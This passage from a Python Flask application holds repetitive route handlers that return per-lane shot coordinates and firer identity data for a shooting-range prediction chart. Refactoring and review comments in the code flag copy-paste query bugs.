    if request.method == 'POST':
        (firer_id, sess, o, p, u, q, t1_x, t1_y, xmpi, ympi, f, gp,
         Tfirt_x, Tfirt_y, fin_x_1, fin_y_1, result_1,
         fir_tendency_1) = prediction_calculation_2()
        paper_ref = db.session.query(TPaper_ref.paper_ref).scalar()

        def set_rows(set_no):
            # Rows for one set of target 2 today.  Queried ONCE and reused
            # for both x and y (the original issued the identical query twice).
            return db.session.query(T_Firer_Details).filter(
                T_Firer_Details.date == curdate,
                T_Firer_Details.target_no == 2,
                T_Firer_Details.set_no == set_no,
                T_Firer_Details.paper_ref == paper_ref,
                T_Firer_Details.session_id == sess).all()

        def set_scalar(column, set_no):
            # Single distinct value of *column* for one set of target 2.
            return db.session.query(column).filter(
                T_Firer_Details.date == curdate,
                T_Firer_Details.target_no == 2,
                T_Firer_Details.set_no == set_no,
                T_Firer_Details.paper_ref == paper_ref,
                T_Firer_Details.session_id == sess).distinct().scalar()

        def shooter_scalar(column, shooter_id):
            # One Shooter attribute looked up by id.
            return db.session.query(column).filter(Shooter.id == shooter_id).scalar()

        for rows, x_arr, y_arr in ((set_rows(2), set_2_x_arr, set_2_y_arr),
                                   (set_rows(3), set_3_x_arr, set_3_y_arr),
                                   (set_rows(4), set_4_x_arr, set_4_y_arr)):
            for row in rows:
                x_arr.append(int(row.final_x))
                y_arr.append(int(row.final_y))

        set_1_id = set_scalar(T_Firer_Details.firer_id, 1)
        set_1_session_no = set_scalar(T_Firer_Details.session_id, 1)
        set_1_detail_no = set_scalar(T_Firer_Details.detail_id, 1)
        set_1_name = shooter_scalar(Shooter.name, set_1_id)
        set_1_army = shooter_scalar(Shooter.service_id, set_1_id)

        set_2_id = set_scalar(T_Firer_Details.firer_id, 2)
        set_2_session_no = set_scalar(T_Firer_Details.session_id, 2)
        set_2_detail_no = set_scalar(T_Firer_Details.detail_id, 2)
        set_2_name = shooter_scalar(Shooter.name, set_2_id)
        set_2_army = shooter_scalar(Shooter.service_id, set_2_id)

        set_3_id = set_scalar(T_Firer_Details.firer_id, 3)
        set_3_session_no = set_scalar(T_Firer_Details.session_id, 3)
        set_3_detail_no = set_scalar(T_Firer_Details.detail_id, 3)
        set_3_name = shooter_scalar(Shooter.name, set_3_id)
        set_3_army = shooter_scalar(Shooter.service_id, set_3_id)

        set_4_id = set_scalar(T_Firer_Details.firer_id, 4)
        set_4_session_no = set_scalar(T_Firer_Details.session_id, 4)
        set_4_detail_no = set_scalar(T_Firer_Details.detail_id, 4)
        set_4_name = shooter_scalar(Shooter.name, set_4_id)
        set_4_army = shooter_scalar(Shooter.service_id, set_4_id)

        current_firer_name = shooter_scalar(Shooter.name, firer_id)
        current_army_no = shooter_scalar(Shooter.service_id, firer_id)
        # BUG FIX: the original filtered on TShooting.target_1_id here
        # (copy-paste from the target-1 route); this firer is on target 2.
        current_session_no = db.session.query(TShooting.session_id).filter(
            TShooting.target_2_id == firer_id).scalar()
        current_detail_no = db.session.query(TShooting.detail_no).filter(
            TShooting.target_2_id == firer_id).scalar()

        # JSON-encode the trend series for the chart.  (The original also
        # computed unused xmpi_j/ympi_j via pixeltoinch(); dead code removed.)
        Tfirt_x_j = pd.Series(Tfirt_x).to_json(orient='values')
        Tfirt_y_j = pd.Series(Tfirt_y).to_json(orient='values')
        fin_x_arr_1 = [int(x_1.final_x) for x_1 in fin_x_1]
        fin_y_arr_1 = [int(y_1.final_y) for y_1 in fin_y_1]
    return jsonify(x1=t1_x,
                   y1=t1_y,
                   xmpi1=Tfirt_x_j,
                   ympi1=Tfirt_y_j,
                   gp=gp,
                   txf1=Tfirt_x_j,
                   tyf1=Tfirt_y_j,
                   fx1=fin_x_arr_1,
                   fy1=fin_y_arr_1,
                   result_1=result_1,
                   fir_tendency_1=fir_tendency_1,
                   set_1_name=set_1_name,
                   current_firer_name=current_firer_name,
                   set_1_army=set_1_army,
                   current_army_no=current_army_no,
                   set_1_session_no=set_1_session_no,
                   current_session_no=current_session_no,
                   set_1_detail_no=set_1_detail_no,
                   current_detail_no=current_detail_no,
                   set_2_x=set_2_x_arr,
                   set_2_y=set_2_y_arr,
                   set_2_name=set_2_name,
                   set_2_army=set_2_army,
                   set_2_detail_no=set_2_detail_no,
                   set_2_session_no=set_2_session_no,
                   set_3_x=set_3_x_arr,
                   set_3_y=set_3_y_arr,
                   set_3_name=set_3_name,
                   set_3_army=set_3_army,
                   set_3_session_no=set_3_session_no,
                   set_3_detail_no=set_3_detail_no,
                   set_4_x=set_4_x_arr,
                   set_4_y=set_4_y_arr,
                   set_4_name=set_4_name,
                   set_4_army=set_4_army,
                   set_4_session_no=set_4_session_no,
                   set_4_detail_no=set_4_detail_no)
@app.route('/prediction_target_3/', methods=['GET', 'POST'])
def prediction_target_3():
    """Return the chart/prediction payload for target 3 as JSON.

    POST: runs prediction_calculation_3() for the current firer, loads the
    final shot coordinates of sets 2-4 and the identity data of sets 1-4
    for today's paper/session, and returns everything the chart page needs.
    GET: returns the same payload filled with neutral defaults.
    """
    # Neutral defaults so a GET request still yields a well-formed payload.
    t1_x = 0
    t1_y = 0
    gp = 0
    Tfirt_x_j = 0
    Tfirt_y_j = 0
    result_1 = None
    fir_tendency_1 = None
    set_1_name = None
    set_1_army = None
    set_1_session_no = None
    set_1_detail_no = None
    set_2_name = None
    set_2_army = None
    set_2_session_no = None
    set_2_detail_no = None
    set_3_name = None
    set_3_army = None
    set_3_session_no = None
    set_3_detail_no = None
    set_4_name = None
    set_4_army = None
    set_4_session_no = None
    set_4_detail_no = None
    current_firer_name = None
    current_army_no = None
    current_session_no = None
    current_detail_no = None
    set_2_x_arr = []
    set_2_y_arr = []
    set_3_x_arr = []
    set_3_y_arr = []
    set_4_x_arr = []
    set_4_y_arr = []
    fin_x_arr_1 = []
    fin_y_arr_1 = []
    curdate = time.strftime("%Y-%m-%d")
    if request.method == 'POST':
        (firer_id, sess, o, p, u, q, t1_x, t1_y, xmpi, ympi, f, gp,
         Tfirt_x, Tfirt_y, fin_x_1, fin_y_1, result_1,
         fir_tendency_1) = prediction_calculation_3()
        paper_ref = db.session.query(TPaper_ref.paper_ref).scalar()

        def set_rows(set_no):
            # Rows for one set of target 3 today.  Queried ONCE and reused
            # for both x and y (the original issued the identical query twice).
            return db.session.query(T_Firer_Details).filter(
                T_Firer_Details.date == curdate,
                T_Firer_Details.target_no == 3,
                T_Firer_Details.set_no == set_no,
                T_Firer_Details.paper_ref == paper_ref,
                T_Firer_Details.session_id == sess).all()

        def set_scalar(column, set_no):
            # Single distinct value of *column* for one set of target 3.
            return db.session.query(column).filter(
                T_Firer_Details.date == curdate,
                T_Firer_Details.target_no == 3,
                T_Firer_Details.set_no == set_no,
                T_Firer_Details.paper_ref == paper_ref,
                T_Firer_Details.session_id == sess).distinct().scalar()

        def shooter_scalar(column, shooter_id):
            # One Shooter attribute looked up by id.
            return db.session.query(column).filter(Shooter.id == shooter_id).scalar()

        # BUG FIX: the original filled set_3_y_arr and set_4_y_arr by
        # iterating set_2_y while referencing undefined names y_3/y_4
        # (a NameError waiting to happen); each set now iterates its own rows.
        for rows, x_arr, y_arr in ((set_rows(2), set_2_x_arr, set_2_y_arr),
                                   (set_rows(3), set_3_x_arr, set_3_y_arr),
                                   (set_rows(4), set_4_x_arr, set_4_y_arr)):
            for row in rows:
                x_arr.append(int(row.final_x))
                y_arr.append(int(row.final_y))

        set_1_id = set_scalar(T_Firer_Details.firer_id, 1)
        set_1_session_no = set_scalar(T_Firer_Details.session_id, 1)
        set_1_detail_no = set_scalar(T_Firer_Details.detail_id, 1)
        set_1_name = shooter_scalar(Shooter.name, set_1_id)
        set_1_army = shooter_scalar(Shooter.service_id, set_1_id)

        set_2_id = set_scalar(T_Firer_Details.firer_id, 2)
        set_2_session_no = set_scalar(T_Firer_Details.session_id, 2)
        set_2_detail_no = set_scalar(T_Firer_Details.detail_id, 2)
        set_2_name = shooter_scalar(Shooter.name, set_2_id)
        set_2_army = shooter_scalar(Shooter.service_id, set_2_id)

        set_3_id = set_scalar(T_Firer_Details.firer_id, 3)
        set_3_session_no = set_scalar(T_Firer_Details.session_id, 3)
        set_3_detail_no = set_scalar(T_Firer_Details.detail_id, 3)
        set_3_name = shooter_scalar(Shooter.name, set_3_id)
        set_3_army = shooter_scalar(Shooter.service_id, set_3_id)

        set_4_id = set_scalar(T_Firer_Details.firer_id, 4)
        set_4_session_no = set_scalar(T_Firer_Details.session_id, 4)
        set_4_detail_no = set_scalar(T_Firer_Details.detail_id, 4)
        set_4_name = shooter_scalar(Shooter.name, set_4_id)
        set_4_army = shooter_scalar(Shooter.service_id, set_4_id)

        current_firer_name = shooter_scalar(Shooter.name, firer_id)
        current_army_no = shooter_scalar(Shooter.service_id, firer_id)
        # BUG FIX: the original filtered on TShooting.target_1_id here
        # (copy-paste from the target-1 route); this firer is on target 3.
        current_session_no = db.session.query(TShooting.session_id).filter(
            TShooting.target_3_id == firer_id).scalar()
        current_detail_no = db.session.query(TShooting.detail_no).filter(
            TShooting.target_3_id == firer_id).scalar()

        # JSON-encode the trend series for the chart.  (The original also
        # computed unused xmpi_j/ympi_j via pixeltoinch(); dead code removed.)
        Tfirt_x_j = pd.Series(Tfirt_x).to_json(orient='values')
        Tfirt_y_j = pd.Series(Tfirt_y).to_json(orient='values')
        fin_x_arr_1 = [int(x_1.final_x) for x_1 in fin_x_1]
        fin_y_arr_1 = [int(y_1.final_y) for y_1 in fin_y_1]
    return jsonify(x1=t1_x,
                   y1=t1_y,
                   xmpi1=Tfirt_x_j,
                   ympi1=Tfirt_y_j,
                   gp=gp,
                   txf1=Tfirt_x_j,
                   tyf1=Tfirt_y_j,
                   fx1=fin_x_arr_1,
                   fy1=fin_y_arr_1,
                   result_1=result_1,
                   fir_tendency_1=fir_tendency_1,
                   set_1_name=set_1_name,
                   current_firer_name=current_firer_name,
                   set_1_army=set_1_army,
                   current_army_no=current_army_no,
                   set_1_session_no=set_1_session_no,
                   current_session_no=current_session_no,
                   set_1_detail_no=set_1_detail_no,
                   current_detail_no=current_detail_no,
                   set_2_x=set_2_x_arr,
                   set_2_y=set_2_y_arr,
                   set_2_name=set_2_name,
                   set_2_army=set_2_army,
                   set_2_detail_no=set_2_detail_no,
                   set_2_session_no=set_2_session_no,
                   set_3_x=set_3_x_arr,
                   set_3_y=set_3_y_arr,
                   set_3_name=set_3_name,
                   set_3_army=set_3_army,
                   set_3_session_no=set_3_session_no,
                   set_3_detail_no=set_3_detail_no,
                   set_4_x=set_4_x_arr,
                   set_4_y=set_4_y_arr,
                   set_4_name=set_4_name,
                   set_4_army=set_4_army,
                   set_4_session_no=set_4_session_no,
                   set_4_detail_no=set_4_detail_no)
@app.route('/prediction_target_4/', methods=['GET', 'POST'])
def prediction_target_4():
    """Return the chart/prediction payload for target 4 as JSON.

    POST: runs prediction_calculation_4() for the current firer, loads the
    final shot coordinates of sets 2-4 and the identity data of sets 1-4
    for today's paper/session, and returns everything the chart page needs.
    GET: returns the same payload filled with neutral defaults.
    """
    # Neutral defaults so a GET request still yields a well-formed payload.
    t1_x = 0
    t1_y = 0
    gp = 0
    Tfirt_x_j = 0
    Tfirt_y_j = 0
    result_1 = None
    fir_tendency_1 = None
    set_1_name = None
    set_1_army = None
    set_1_session_no = None
    set_1_detail_no = None
    set_2_name = None
    set_2_army = None
    set_2_session_no = None
    set_2_detail_no = None
    set_3_name = None
    set_3_army = None
    set_3_session_no = None
    set_3_detail_no = None
    set_4_name = None
    set_4_army = None
    set_4_session_no = None
    set_4_detail_no = None
    current_firer_name = None
    current_army_no = None
    current_session_no = None
    current_detail_no = None
    set_2_x_arr = []
    set_2_y_arr = []
    set_3_x_arr = []
    set_3_y_arr = []
    set_4_x_arr = []
    set_4_y_arr = []
    fin_x_arr_1 = []
    fin_y_arr_1 = []
    curdate = time.strftime("%Y-%m-%d")
    if request.method == 'POST':
        (firer_id, sess, o, p, u, q, t1_x, t1_y, xmpi, ympi, f, gp,
         Tfirt_x, Tfirt_y, fin_x_1, fin_y_1, result_1,
         fir_tendency_1) = prediction_calculation_4()
        paper_ref = db.session.query(TPaper_ref.paper_ref).scalar()

        def set_rows(set_no):
            # Rows for one set of target 4 today.  Queried ONCE and reused
            # for both x and y (the original issued the identical query twice).
            return db.session.query(T_Firer_Details).filter(
                T_Firer_Details.date == curdate,
                T_Firer_Details.target_no == 4,
                T_Firer_Details.set_no == set_no,
                T_Firer_Details.paper_ref == paper_ref,
                T_Firer_Details.session_id == sess).all()

        def set_scalar(column, set_no):
            # Single distinct value of *column* for one set of target 4.
            return db.session.query(column).filter(
                T_Firer_Details.date == curdate,
                T_Firer_Details.target_no == 4,
                T_Firer_Details.set_no == set_no,
                T_Firer_Details.paper_ref == paper_ref,
                T_Firer_Details.session_id == sess).distinct().scalar()

        def shooter_scalar(column, shooter_id):
            # One Shooter attribute looked up by id.
            return db.session.query(column).filter(Shooter.id == shooter_id).scalar()

        for rows, x_arr, y_arr in ((set_rows(2), set_2_x_arr, set_2_y_arr),
                                   (set_rows(3), set_3_x_arr, set_3_y_arr),
                                   (set_rows(4), set_4_x_arr, set_4_y_arr)):
            for row in rows:
                x_arr.append(int(row.final_x))
                y_arr.append(int(row.final_y))

        set_1_id = set_scalar(T_Firer_Details.firer_id, 1)
        set_1_session_no = set_scalar(T_Firer_Details.session_id, 1)
        set_1_detail_no = set_scalar(T_Firer_Details.detail_id, 1)
        set_1_name = shooter_scalar(Shooter.name, set_1_id)
        set_1_army = shooter_scalar(Shooter.service_id, set_1_id)

        set_2_id = set_scalar(T_Firer_Details.firer_id, 2)
        set_2_session_no = set_scalar(T_Firer_Details.session_id, 2)
        set_2_detail_no = set_scalar(T_Firer_Details.detail_id, 2)
        set_2_name = shooter_scalar(Shooter.name, set_2_id)
        set_2_army = shooter_scalar(Shooter.service_id, set_2_id)

        set_3_id = set_scalar(T_Firer_Details.firer_id, 3)
        set_3_session_no = set_scalar(T_Firer_Details.session_id, 3)
        set_3_detail_no = set_scalar(T_Firer_Details.detail_id, 3)
        set_3_name = shooter_scalar(Shooter.name, set_3_id)
        set_3_army = shooter_scalar(Shooter.service_id, set_3_id)

        set_4_id = set_scalar(T_Firer_Details.firer_id, 4)
        set_4_session_no = set_scalar(T_Firer_Details.session_id, 4)
        set_4_detail_no = set_scalar(T_Firer_Details.detail_id, 4)
        set_4_name = shooter_scalar(Shooter.name, set_4_id)
        set_4_army = shooter_scalar(Shooter.service_id, set_4_id)

        current_firer_name = shooter_scalar(Shooter.name, firer_id)
        current_army_no = shooter_scalar(Shooter.service_id, firer_id)
        # BUG FIX: the original filtered on TShooting.target_1_id here
        # (copy-paste from the target-1 route); this firer is on target 4.
        current_session_no = db.session.query(TShooting.session_id).filter(
            TShooting.target_4_id == firer_id).scalar()
        current_detail_no = db.session.query(TShooting.detail_no).filter(
            TShooting.target_4_id == firer_id).scalar()

        # JSON-encode the trend series for the chart.  (The original also
        # computed unused xmpi_j/ympi_j via pixeltoinch(); dead code removed.)
        Tfirt_x_j = pd.Series(Tfirt_x).to_json(orient='values')
        Tfirt_y_j = pd.Series(Tfirt_y).to_json(orient='values')
        fin_x_arr_1 = [int(x_1.final_x) for x_1 in fin_x_1]
        fin_y_arr_1 = [int(y_1.final_y) for y_1 in fin_y_1]
    return jsonify(x1=t1_x,
                   y1=t1_y,
                   xmpi1=Tfirt_x_j,
                   ympi1=Tfirt_y_j,
                   gp=gp,
                   txf1=Tfirt_x_j,
                   tyf1=Tfirt_y_j,
                   fx1=fin_x_arr_1,
                   fy1=fin_y_arr_1,
                   result_1=result_1,
                   fir_tendency_1=fir_tendency_1,
                   set_1_name=set_1_name,
                   current_firer_name=current_firer_name,
                   set_1_army=set_1_army,
                   current_army_no=current_army_no,
                   set_1_session_no=set_1_session_no,
                   current_session_no=current_session_no,
                   set_1_detail_no=set_1_detail_no,
                   current_detail_no=current_detail_no,
                   set_2_x=set_2_x_arr,
                   set_2_y=set_2_y_arr,
                   set_2_name=set_2_name,
                   set_2_army=set_2_army,
                   set_2_detail_no=set_2_detail_no,
                   set_2_session_no=set_2_session_no,
                   set_3_x=set_3_x_arr,
                   set_3_y=set_3_y_arr,
                   set_3_name=set_3_name,
                   set_3_army=set_3_army,
                   set_3_session_no=set_3_session_no,
                   set_3_detail_no=set_3_detail_no,
                   set_4_x=set_4_x_arr,
                   set_4_y=set_4_y_arr,
                   set_4_name=set_4_name,
                   set_4_army=set_4_army,
                   set_4_session_no=set_4_session_no,
                   set_4_detail_no=set_4_detail_no)
@app.route('/prediction_target_5/', methods=['GET', 'POST'])
def prediction_target_5():
    """Serve shot-prediction data for target lane 5 as JSON.

    On POST: runs ``prediction_calculation_5()``, then looks up, for today's
    paper reference and session, the firer identity (name / service no /
    session / detail) for sets 1-4 and the final shot coordinates for sets
    2-4, and returns everything in one JSON payload.  On GET: returns the
    same JSON shape filled with zero/empty placeholders.

    Returns:
        flask.Response: JSON with the same keys the original handler emitted
        (x1, y1, xmpi1, ..., set_4_detail_no).
    """
    TARGET_NO = 5
    # Placeholder values so a GET still produces a complete payload.
    t1_x = t1_y = gp = 0
    Tfirt_x_j = Tfirt_y_j = 0
    result_1 = None
    fir_tendency_1 = None
    current_firer_name = None
    current_army_no = None
    current_session_no = None
    current_detail_no = None
    # Per-set lookups, keyed by set number (1-4 for identity, 2-4 for shots).
    names = {n: None for n in (1, 2, 3, 4)}
    armies = {n: None for n in (1, 2, 3, 4)}
    session_nos = {n: None for n in (1, 2, 3, 4)}
    detail_nos = {n: None for n in (1, 2, 3, 4)}
    xs = {n: [] for n in (2, 3, 4)}
    ys = {n: [] for n in (2, 3, 4)}
    fin_x_arr_1 = []
    fin_y_arr_1 = []
    curdate = time.strftime("%Y-%m-%d")
    if request.method == 'POST':
        (firer_id, sess, o, p, u, q, t1_x, t1_y, xmpi, ympi, f, gp,
         Tfirt_x, Tfirt_y, fin_x_1, fin_y_1, result_1,
         fir_tendency_1) = prediction_calculation_5()
        paper_ref = db.session.query(TPaper_ref.paper_ref).scalar()

        def for_set(query, set_no):
            # Shared filter: this target, today, this paper ref and session.
            return query.filter(
                T_Firer_Details.date == curdate,
                T_Firer_Details.target_no == TARGET_NO,
                T_Firer_Details.set_no == set_no,
                T_Firer_Details.paper_ref == paper_ref,
                T_Firer_Details.session_id == sess,
            )

        for n in (2, 3, 4):
            # One query per set; the old code ran the identical query twice
            # (once for x, once for y).
            rows = for_set(db.session.query(T_Firer_Details), n).all()
            xs[n] = [int(r.final_x) for r in rows]
            ys[n] = [int(r.final_y) for r in rows]
        for n in (1, 2, 3, 4):
            set_id = for_set(
                db.session.query(T_Firer_Details.firer_id), n
            ).distinct().scalar()
            session_nos[n] = for_set(
                db.session.query(T_Firer_Details.session_id), n
            ).distinct().scalar()
            detail_nos[n] = for_set(
                db.session.query(T_Firer_Details.detail_id), n
            ).distinct().scalar()
            names[n] = db.session.query(Shooter.name).filter(
                Shooter.id == set_id).scalar()
            armies[n] = db.session.query(Shooter.service_id).filter(
                Shooter.id == set_id).scalar()
        current_firer_name = db.session.query(Shooter.name).filter(
            Shooter.id == firer_id).scalar()
        current_army_no = db.session.query(Shooter.service_id).filter(
            Shooter.id == firer_id).scalar()
        # NOTE(review): filters on target_1_id even though this is the
        # target-5 route — looks copy-pasted; confirm the intended column.
        current_session_no = db.session.query(TShooting.session_id).filter(
            TShooting.target_1_id == firer_id).scalar()
        current_detail_no = db.session.query(TShooting.detail_no).filter(
            TShooting.target_1_id == firer_id).scalar()
        # NOTE(review): the original also computed xmpi_j/ympi_j via
        # pixeltoinch() but never sent them (xmpi1/ympi1 carry Tfirt_*_j);
        # that dead work is dropped here.  If xmpi1 was *meant* to carry the
        # inch-converted MPI, that is a separate behavior change to confirm.
        Tfirt_x_j = pd.Series(Tfirt_x).to_json(orient='values')
        Tfirt_y_j = pd.Series(Tfirt_y).to_json(orient='values')
        fin_x_arr_1 = [int(r.final_x) for r in fin_x_1]
        fin_y_arr_1 = [int(r.final_y) for r in fin_y_1]
    return jsonify(x1=t1_x,
                   y1=t1_y,
                   xmpi1=Tfirt_x_j,
                   ympi1=Tfirt_y_j,
                   gp=gp,
                   txf1=Tfirt_x_j,
                   tyf1=Tfirt_y_j,
                   fx1=fin_x_arr_1,
                   fy1=fin_y_arr_1,
                   result_1=result_1,
                   fir_tendency_1=fir_tendency_1,
                   set_1_name=names[1],
                   current_firer_name=current_firer_name,
                   set_1_army=armies[1],
                   current_army_no=current_army_no,
                   set_1_session_no=session_nos[1],
                   current_session_no=current_session_no,
                   set_1_detail_no=detail_nos[1],
                   current_detail_no=current_detail_no,
                   set_2_x=xs[2],
                   set_2_y=ys[2],
                   set_2_name=names[2],
                   set_2_army=armies[2],
                   set_2_detail_no=detail_nos[2],
                   set_2_session_no=session_nos[2],
                   set_3_x=xs[3],
                   set_3_y=ys[3],
                   set_3_name=names[3],
                   set_3_army=armies[3],
                   set_3_session_no=session_nos[3],
                   set_3_detail_no=detail_nos[3],
                   set_4_x=xs[4],
                   set_4_y=ys[4],
                   set_4_name=names[4],
                   set_4_army=armies[4],
                   set_4_session_no=session_nos[4],
                   set_4_detail_no=detail_nos[4]
                   )
@app.route('/prediction_target_6/', methods=['GET', 'POST'])
def prediction_target_6():
    """Serve shot-prediction data for target lane 6 as JSON.

    On POST: runs ``prediction_calculation_6()``, then looks up, for today's
    paper reference and session, the firer identity (name / service no /
    session / detail) for sets 1-4 and the final shot coordinates for sets
    2-4, and returns everything in one JSON payload.  On GET: returns the
    same JSON shape filled with zero/empty placeholders.

    Returns:
        flask.Response: JSON with the same keys the original handler emitted
        (x1, y1, xmpi1, ..., set_4_detail_no).
    """
    TARGET_NO = 6
    # Placeholder values so a GET still produces a complete payload.
    t1_x = t1_y = gp = 0
    Tfirt_x_j = Tfirt_y_j = 0
    result_1 = None
    fir_tendency_1 = None
    current_firer_name = None
    current_army_no = None
    current_session_no = None
    current_detail_no = None
    # Per-set lookups, keyed by set number (1-4 for identity, 2-4 for shots).
    names = {n: None for n in (1, 2, 3, 4)}
    armies = {n: None for n in (1, 2, 3, 4)}
    session_nos = {n: None for n in (1, 2, 3, 4)}
    detail_nos = {n: None for n in (1, 2, 3, 4)}
    xs = {n: [] for n in (2, 3, 4)}
    ys = {n: [] for n in (2, 3, 4)}
    fin_x_arr_1 = []
    fin_y_arr_1 = []
    curdate = time.strftime("%Y-%m-%d")
    if request.method == 'POST':
        (firer_id, sess, o, p, u, q, t1_x, t1_y, xmpi, ympi, f, gp,
         Tfirt_x, Tfirt_y, fin_x_1, fin_y_1, result_1,
         fir_tendency_1) = prediction_calculation_6()
        paper_ref = db.session.query(TPaper_ref.paper_ref).scalar()

        def for_set(query, set_no):
            # Shared filter: this target, today, this paper ref and session.
            return query.filter(
                T_Firer_Details.date == curdate,
                T_Firer_Details.target_no == TARGET_NO,
                T_Firer_Details.set_no == set_no,
                T_Firer_Details.paper_ref == paper_ref,
                T_Firer_Details.session_id == sess,
            )

        for n in (2, 3, 4):
            # One query per set; the old code ran the identical query twice
            # (once for x, once for y).
            rows = for_set(db.session.query(T_Firer_Details), n).all()
            xs[n] = [int(r.final_x) for r in rows]
            ys[n] = [int(r.final_y) for r in rows]
        for n in (1, 2, 3, 4):
            set_id = for_set(
                db.session.query(T_Firer_Details.firer_id), n
            ).distinct().scalar()
            session_nos[n] = for_set(
                db.session.query(T_Firer_Details.session_id), n
            ).distinct().scalar()
            detail_nos[n] = for_set(
                db.session.query(T_Firer_Details.detail_id), n
            ).distinct().scalar()
            names[n] = db.session.query(Shooter.name).filter(
                Shooter.id == set_id).scalar()
            armies[n] = db.session.query(Shooter.service_id).filter(
                Shooter.id == set_id).scalar()
        current_firer_name = db.session.query(Shooter.name).filter(
            Shooter.id == firer_id).scalar()
        current_army_no = db.session.query(Shooter.service_id).filter(
            Shooter.id == firer_id).scalar()
        # NOTE(review): filters on target_1_id even though this is the
        # target-6 route — looks copy-pasted; confirm the intended column.
        current_session_no = db.session.query(TShooting.session_id).filter(
            TShooting.target_1_id == firer_id).scalar()
        current_detail_no = db.session.query(TShooting.detail_no).filter(
            TShooting.target_1_id == firer_id).scalar()
        # NOTE(review): the original also computed xmpi_j/ympi_j via
        # pixeltoinch() but never sent them (xmpi1/ympi1 carry Tfirt_*_j);
        # that dead work is dropped here.  If xmpi1 was *meant* to carry the
        # inch-converted MPI, that is a separate behavior change to confirm.
        Tfirt_x_j = pd.Series(Tfirt_x).to_json(orient='values')
        Tfirt_y_j = pd.Series(Tfirt_y).to_json(orient='values')
        fin_x_arr_1 = [int(r.final_x) for r in fin_x_1]
        fin_y_arr_1 = [int(r.final_y) for r in fin_y_1]
    return jsonify(x1=t1_x,
                   y1=t1_y,
                   xmpi1=Tfirt_x_j,
                   ympi1=Tfirt_y_j,
                   gp=gp,
                   txf1=Tfirt_x_j,
                   tyf1=Tfirt_y_j,
                   fx1=fin_x_arr_1,
                   fy1=fin_y_arr_1,
                   result_1=result_1,
                   fir_tendency_1=fir_tendency_1,
                   set_1_name=names[1],
                   current_firer_name=current_firer_name,
                   set_1_army=armies[1],
                   current_army_no=current_army_no,
                   set_1_session_no=session_nos[1],
                   current_session_no=current_session_no,
                   set_1_detail_no=detail_nos[1],
                   current_detail_no=current_detail_no,
                   set_2_x=xs[2],
                   set_2_y=ys[2],
                   set_2_name=names[2],
                   set_2_army=armies[2],
                   set_2_detail_no=detail_nos[2],
                   set_2_session_no=session_nos[2],
                   set_3_x=xs[3],
                   set_3_y=ys[3],
                   set_3_name=names[3],
                   set_3_army=armies[3],
                   set_3_session_no=session_nos[3],
                   set_3_detail_no=detail_nos[3],
                   set_4_x=xs[4],
                   set_4_y=ys[4],
                   set_4_name=names[4],
                   set_4_army=armies[4],
                   set_4_session_no=session_nos[4],
                   set_4_detail_no=detail_nos[4]
                   )
@app.route('/prediction_target_7/', methods=['GET', 'POST'])
def prediction_target_7():
    """Serve shot-prediction data for target lane 7 as JSON.

    On POST: runs ``prediction_calculation_7()``, then looks up, for today's
    paper reference and session, the firer identity (name / service no /
    session / detail) for sets 1-4 and the final shot coordinates for sets
    2-4, and returns everything in one JSON payload.  On GET: returns the
    same JSON shape filled with zero/empty placeholders.

    Returns:
        flask.Response: JSON with the same keys the original handler emitted
        (x1, y1, xmpi1, ..., set_4_detail_no).
    """
    TARGET_NO = 7
    # Placeholder values so a GET still produces a complete payload.
    t1_x = t1_y = gp = 0
    Tfirt_x_j = Tfirt_y_j = 0
    result_1 = None
    fir_tendency_1 = None
    current_firer_name = None
    current_army_no = None
    current_session_no = None
    current_detail_no = None
    # Per-set lookups, keyed by set number (1-4 for identity, 2-4 for shots).
    names = {n: None for n in (1, 2, 3, 4)}
    armies = {n: None for n in (1, 2, 3, 4)}
    session_nos = {n: None for n in (1, 2, 3, 4)}
    detail_nos = {n: None for n in (1, 2, 3, 4)}
    xs = {n: [] for n in (2, 3, 4)}
    ys = {n: [] for n in (2, 3, 4)}
    fin_x_arr_1 = []
    fin_y_arr_1 = []
    curdate = time.strftime("%Y-%m-%d")
    if request.method == 'POST':
        (firer_id, sess, o, p, u, q, t1_x, t1_y, xmpi, ympi, f, gp,
         Tfirt_x, Tfirt_y, fin_x_1, fin_y_1, result_1,
         fir_tendency_1) = prediction_calculation_7()
        paper_ref = db.session.query(TPaper_ref.paper_ref).scalar()

        def for_set(query, set_no):
            # Shared filter: this target, today, this paper ref and session.
            return query.filter(
                T_Firer_Details.date == curdate,
                T_Firer_Details.target_no == TARGET_NO,
                T_Firer_Details.set_no == set_no,
                T_Firer_Details.paper_ref == paper_ref,
                T_Firer_Details.session_id == sess,
            )

        for n in (2, 3, 4):
            # One query per set; the old code ran the identical query twice
            # (once for x, once for y).
            rows = for_set(db.session.query(T_Firer_Details), n).all()
            xs[n] = [int(r.final_x) for r in rows]
            ys[n] = [int(r.final_y) for r in rows]
        for n in (1, 2, 3, 4):
            set_id = for_set(
                db.session.query(T_Firer_Details.firer_id), n
            ).distinct().scalar()
            session_nos[n] = for_set(
                db.session.query(T_Firer_Details.session_id), n
            ).distinct().scalar()
            detail_nos[n] = for_set(
                db.session.query(T_Firer_Details.detail_id), n
            ).distinct().scalar()
            names[n] = db.session.query(Shooter.name).filter(
                Shooter.id == set_id).scalar()
            armies[n] = db.session.query(Shooter.service_id).filter(
                Shooter.id == set_id).scalar()
        current_firer_name = db.session.query(Shooter.name).filter(
            Shooter.id == firer_id).scalar()
        current_army_no = db.session.query(Shooter.service_id).filter(
            Shooter.id == firer_id).scalar()
        # NOTE(review): filters on target_1_id even though this is the
        # target-7 route — looks copy-pasted; confirm the intended column.
        current_session_no = db.session.query(TShooting.session_id).filter(
            TShooting.target_1_id == firer_id).scalar()
        current_detail_no = db.session.query(TShooting.detail_no).filter(
            TShooting.target_1_id == firer_id).scalar()
        # NOTE(review): the original also computed xmpi_j/ympi_j via
        # pixeltoinch() but never sent them (xmpi1/ympi1 carry Tfirt_*_j);
        # that dead work is dropped here.  If xmpi1 was *meant* to carry the
        # inch-converted MPI, that is a separate behavior change to confirm.
        Tfirt_x_j = pd.Series(Tfirt_x).to_json(orient='values')
        Tfirt_y_j = pd.Series(Tfirt_y).to_json(orient='values')
        fin_x_arr_1 = [int(r.final_x) for r in fin_x_1]
        fin_y_arr_1 = [int(r.final_y) for r in fin_y_1]
    return jsonify(x1=t1_x,
                   y1=t1_y,
                   xmpi1=Tfirt_x_j,
                   ympi1=Tfirt_y_j,
                   gp=gp,
                   txf1=Tfirt_x_j,
                   tyf1=Tfirt_y_j,
                   fx1=fin_x_arr_1,
                   fy1=fin_y_arr_1,
                   result_1=result_1,
                   fir_tendency_1=fir_tendency_1,
                   set_1_name=names[1],
                   current_firer_name=current_firer_name,
